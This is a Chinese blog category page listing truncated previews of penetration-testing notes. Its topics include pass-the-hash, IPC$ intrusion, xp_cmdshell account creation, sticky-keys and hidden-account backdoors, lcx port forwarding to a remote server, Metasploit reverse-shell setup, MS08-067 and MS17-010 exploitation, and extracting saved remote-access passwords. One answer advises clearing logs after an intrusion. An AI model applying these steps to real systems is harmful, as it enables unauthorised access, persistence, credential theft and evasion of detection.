![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透相关
sysprogram
这个作者很懒,什么都没留下…
展开
-
XP MSTSC连接WIN7或WIN8问题
解决方法:远程计算机需要网络级别身份验证,而您的计算机不支持该验证故障:“远程计算机需要网络级别身份验证,而您的计算机不支持该验证,请联系您的系统管理员或者技术人员来获得帮助” 故障症状:当您使用Windows XP“远程桌面连接”工具去连接Windows Vistas或Windows Server 2008的远程桌面、终端服务时,出现上述故障。 故障产生环境:远程桌面原创 2013-08-04 22:38:09 · 3602 阅读 · 0 评论 -
使用Hash直接登录Windows
首先,在本地主机(假设为目标主机) 新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user wooyun test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B原创 2013-10-24 17:27:17 · 2647 阅读 · 0 评论 -
pstools套件在渗透中的应用详解
其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少。当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解。pstool的介绍PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收原创 2013-10-24 17:11:24 · 14480 阅读 · 0 评论 -
pstools工具使用方法
本篇文章是基于pstools 1.6版本。pstools是sysinternals出的一个功能强大的nt/2k远程管理工具包。它的主页为http://www.sysinternals.com/下载地址为http://www.sysinternals.com/files/Pstools.zip(1)psexecpsexec是一个远程执行工具,你可以像使用telnet一样使用它原创 2013-10-24 17:07:52 · 8679 阅读 · 0 评论 -
wireshark过滤规则
一.捕捉过滤器ProtocolDirectionHost(s)ValueLogical OperationsOther expression例子:tcp dst 10.1.1.1 80 andtcp dst 10.2.2.2 3128Protocol(协议):原创 2013-10-17 19:31:16 · 1285 阅读 · 0 评论 -
nmap使用方法
1) 获取远程主机的端口信息和识别主机操作系统(Get info about remote host ports and OS detection)nmap -sS -P0 -sV -O 可以是独立IP, 一个主机名 或一个子网-sS TCP SYN扫描(也叫半开或隐蔽扫描)-P0 选项允许你关闭ICMP ping-sV 选项启用版本检测-O 表示试图识别远程操作系统转载 2013-09-29 11:23:33 · 1476 阅读 · 0 评论 -
Kali-linux安装之后的简单设置
1.更新软件源:root权限:leafpad /etc/apt/sources.list然后添加以下较快的源: deb http://http.kali.org/kali kali main non-free contribdeb-src http://http.kali.org/kali kali main non-free contribdeb http:/转载 2013-09-28 09:40:18 · 22085 阅读 · 0 评论 -
开始体验Kali Linux
开始体验Kali Linux,但是安装完成之后,明明写的密码是对的,但是就是进不去,痛苦中ing...原创 2013-09-24 22:42:51 · 1893 阅读 · 1 评论 -
Win7双开3389
首先更改termsrv.dll的文件所有者,然后将文件的可写权限设置成Everone或Administrator再rename做一个备份,然后copy复制新的termsrv.dll net stop termservicetakeown /F C:\windows\system32\termsrv.dll /Aecho y|cacls %systemroot%\system32原创 2013-09-18 15:43:58 · 5295 阅读 · 0 评论 -
bt5使用教程----主要是渗透方面
喜欢渗透,今年8月才开始接触bt5。看到论坛上有很多帖子,但主要都是讲pj的。如果单单是pj,对于bt5真的是大才小用了。所以决定开个帖子讲讲bt5在渗透方面的应用。这个帖子的主要是根据教主的视频教程,《LiNUX--bt4hei客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,有兴趣的童鞋可以和我一起走进bt5。(ps:教主的视频教程地址:http://v.ku6.com/playli转载 2013-08-10 18:05:30 · 10612 阅读 · 0 评论 -
通过ssh访问Back Track 5
首先在BT5中配置ssh.在BT5中不需要你自己去安装ssh,自身就有的所以直接启动ssh服务# /etc/init.d/ssh restart然后查看ssh是否启动并查看端口22是否开放#netstat -tlp# netstat -ant | grep 22但是到这里后在win7 中使用SSH Secure Shell还是连不上,原来还得先生成两个密钥#ssh-key原创 2013-08-10 14:40:10 · 1460 阅读 · 0 评论 -
查看SecureCRT保存的密码
登录密码保存在CRT的session配置文件中,不过是加密保存的,看不懂也不知道它的加密算法,没法解密. 所以如果能让CRT自己显示出来就好了首先修改要登录的主机的IP地址,改成另外一台机器, 这台的登录密码要跟原来机器的不一样然后连接,这时因为登录密码错误,会弹出一个窗口,显示了用户名和密码,密码是用一串星号表示的随便下一个星号密码查看软件,查看一下就行了。原文地址:https://...原创 2013-10-29 23:59:44 · 62090 阅读 · 3 评论 -
SQL Server 2005如何起用 xp_cmdshell
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。由于xp_cmdshell 可以执行任何操作系统命令,所以一旦SQL Server管理员帐号(如sa)被攻破,那么攻击者就可以利用xp_cmdshell 在SQL Server中执行操作系统命令,如:创建系统管理员,也就意味着系统的最高权限已在别人的掌控之中。由于存在安全隐患,所以在S转载 2013-11-13 17:01:40 · 1584 阅读 · 0 评论 -
web渗透之前端基础
W3C http://www.w3.org 万维网联盟,制定了很多标准,比如html, XML, JavaScript, CSS等等1. 获取HTML内容中的隐私数据 .... ... 隐私数据在这......... 通过JavaScript可以获取id="private_msg"的数据原创 2016-09-25 02:27:09 · 815 阅读 · 0 评论 -
方式程0day MS17-010远程溢出漏洞测试
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。一、环境:靶机:win7 IP:192.168.4.247攻击机:win2003 IP:192.168.4.16反弹shell: kali IP:192.168.4.15在攻击机中需要p...原创 2017-06-02 12:25:34 · 11617 阅读 · 1 评论 -
使用fastcoll进行md5碰撞,两个不同的文件md5值一样。
生成两个文件fastcoll_v1.0.0.5.exe -p C:\windows\notepad.exe -o D:\notepad1.exe D:\notepad2.exe比较 md5 校验是一样的,但是文件内容不一样。两个程序的文件内容不一样,运行的效果打印的东西不一样,一个打印循环打印Goodbye World,一个只打印Hello world。但是md5却一样原创 2017-06-26 23:10:12 · 15940 阅读 · 0 评论 -
SQL手工注入测试
login.html请登录 请输入密码: 用 户: 密 码: login.asp登录<%inname=Request("name")inpass=Request("pass")set co原创 2016-09-24 23:07:18 · 5679 阅读 · 0 评论 -
一句话木马
PHP: ASP: ASP.NET:原创 2016-09-16 20:37:47 · 749 阅读 · 0 评论 -
Windows命令行查看文件的MD5
很实用的命令, Mark一下certutil -hashfile D:\1.exe MD5certutil -hashfile D:\1.exe SHA1certutil -hashfile D:\1.exe SHA256原文地址:https://www.exchen.net/windows%e5%91%bd%e4%bb%a4%e8%a1%8c%e6%9f%a5%e7%9c%8b%e6...原创 2015-10-27 20:38:58 · 61763 阅读 · 10 评论 -
sql xp_cmdshell
Exec master.dbo.xp_cmdshell 'net user testuser /add'原创 2013-11-13 17:05:53 · 931 阅读 · 0 评论 -
ubuntu安装SSH服务
在ubuntu中简单安装运行SSH服务。SSH程序有客户端openssh-client和服务端openssh-server想登陆别的电脑SSH,只需安装openssh-client,ubuntu有默认安装。安装openssh-client:sudo apt-get install openssh-client要让本机开放SSH服务就需要安装openssh-server:su原创 2013-08-10 18:03:00 · 883 阅读 · 0 评论 -
BackTrack5 安装中文输入法
把系统汉化.在终端输入以下命令 sudo apt-get install language-pack-kde-zh language-pack-kde-zh-base language-pack-zh language-pack-zh-base sudo apt-get update 输入法需要的中文包。 sudo apt-get ins原创 2013-08-22 09:55:51 · 1265 阅读 · 0 评论 -
留个HelpAssistant用户后门,呵呵。
//去掉简单文件共享[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]"forceguest"=dword:00000000C:\>net userUser accounts for \\xx------------------------------------------------原创 2013-08-09 10:59:00 · 1872 阅读 · 0 评论 -
IPC$连接常见问答
IPC$连接常见问答十五 ipc$入侵问答精选1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。2.你看下面的情况是为什么,可以连接但不能复制net use \\***.***.***.***\ipc$ "密码" /user:"用户名"命令成功copy icmd.原创 2013-07-25 11:28:39 · 2217 阅读 · 0 评论 -
一份详尽的IPC$入侵资料
一 唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些转载 2013-07-31 11:16:18 · 890 阅读 · 0 评论 -
最酷的windows后门 呵呵
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。参考McafeeAvertLabs:http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/10114979转载 2013-07-31 12:01:23 · 1752 阅读 · 0 评论 -
域环境入侵笔记
net user /domain //查看域用户net config servernet config workstationnltest/dsgetdc:mydomain //查看域控机器的IPnet group "domain computers" /domain //查看域里的成员机器-----------------------------------------原创 2013-07-22 18:24:09 · 1004 阅读 · 0 评论 -
关于IPC入侵的一些细节
1.第一种情况:文件夹选项-查看-使用简单文件共享,如果选择了这个选择,那么IPC输入任一密码都可以建立成功,但是没有权限上传文件.这时IPC破解可以说不好使了.测试:C:\Users\exchen>net use会记录新的网络连接。列表是空的。C:\Users\exchen>net use \\192.168.1.137\ipc$ "12xxx" /user:"adm原创 2013-07-16 15:39:27 · 1011 阅读 · 0 评论 -
lcx转发3389数据
在远程服务器上执行lcx -listen 3030 3166 //表示监听3030端口在内网机器上执行lcx -slave 远程服务器地址 3030 内网机器的内网IP 3389lcx.exe -slave 142.91.xx.xx 3030 192.168.1.138 3389 然后在我们自己机器上使用mstsc连接远程服务器142.91.xx.xx的3361端口 这样原创 2013-05-23 17:39:42 · 3320 阅读 · 0 评论 -
IPC经典入侵
本地机器Win7,目标机器WindowsXP Sp3C:\Users\exchen>net use \\192.168.1.118\ipc$ "123" /user:"administrator"命令成功完成。C:\Users\exchen>copy D:\net.exe \\192.168.1.118\D$已复制 1 个文件。 C:\Users\exc原创 2013-01-21 15:16:53 · 958 阅读 · 0 评论 -
Windows各种提权漏洞对应的补丁号
KB2360937 MS10-084KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB952004 MS09-012 [pr.exe]KB956572 MS09-012 [巴西烤肉]KB9716原创 2012-12-21 01:27:11 · 4108 阅读 · 0 评论 -
ngrep使用方法
ngrep 是grep(在文本中搜索字符串的工具)的网络版,他力求更多的grep特征,用于搜寻指定的数据包。正由于安装ngrep需用到libpcap库, 所以支持大量的操作系统和网络协议。能识别TCP、UDP和ICMP包,理解bpf的过滤机制。 ngrep搜寻数据包ngrep 是grep(在文本中搜索字符串的工具)的网络版,他力求更多的grep特征,用于搜寻指定的数据包。正由于原创 2012-12-04 12:31:36 · 1130 阅读 · 0 评论 -
MSF命令小记
set payload windows/shell_reverse_tcp //反向连接set LHOST 192.168.200.148show options exploit meterpreter是一个很强大的工具。可以payload设置为meterpretermsf exploit(ms08_067_netapi) > set payload windows/me原创 2012-09-25 16:31:38 · 1207 阅读 · 0 评论 -
克隆管理员帐号的方法
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是转载 2013-07-31 11:39:32 · 4414 阅读 · 1 评论 -
设置环境变量
我们可以设置一个用户环境变量,例如,输入:set hosts=c:\windows\system32\drivers\etc回车,我们再用set回车列出当前系统环境变量和用户环境变量,可以发现hosts环境变量也在其中,表示我们成功设置了该变量。我们此时可以在cmd中输入:cd %hosts%回车,就可以进入c:\windows\system32\drivers\etc目录下原创 2013-08-01 10:00:54 · 860 阅读 · 0 评论 -
ms08-067漏洞 远程溢出入侵测试
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English攻击者IP地址:192.168.9.1 //查看数据库连接状态msf > db_status[*] postgresql connected to msf3//使用nmap扫描目标机器msf > db_nmap -sS -sV -O --script=smb-check...原创 2012-09-25 14:24:04 · 35306 阅读 · 0 评论 -
U盘安装BackTrack5,提示Could not find kernel image: linux
U盘安装BT时,出现如下错误: Could not find kernel image: linux 查了一个外国网站,最终找到了方法: 1、确保U盘中存在syslinux.cfg文件。随着所安装的版本的不同,该文件的位置可能不同,通常在/boot/syslinux目录下或者/syslinux目录下。2、如果在U盘中存在isolinux.cfg文件但却不存在syslinux.cfg原创 2013-08-20 17:19:01 · 3232 阅读 · 0 评论 -
BT5下使用Armitage的一些问题
Metasploit不用过多介绍,是一个很强大的入侵工具集,但由于界面多基于命令行模式,自身UI并非那么友好,可能对部分人使用上带来一定困难。而armitage是针对metaspolit开发的一套基于java,metaspolit的扩展程序,实际是类似metaspolit的图形化,让使用上更加直观便利。 下面是具体的安装步骤,使用情况待摸熟后再来介绍,如有不足和错误之处望指正heyih原创 2013-08-19 15:51:08 · 4173 阅读 · 0 评论 -
TeamViewer密码存储
打开注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer\Version7ClientID————————————ID(远程连接时必须项,明文)SecurityPasswordAES——————这项就是我们期待已久的密码了(hash)------------------------------------------------------------原创 2013-08-05 16:49:51 · 9368 阅读 · 0 评论 -
域环境相关命令
关于域命令的东西,为方便大家,整理一份,希望给大家带来一些帮助!~查询域管理员用户:net group “domain admins” /domain查询域用户:net user /domain查询域名称:net view /domain查询域内计算机:net view /domain:XX查询域控制器:net time /domain查询所有域控制原创 2013-07-26 10:02:58 · 1101 阅读 · 0 评论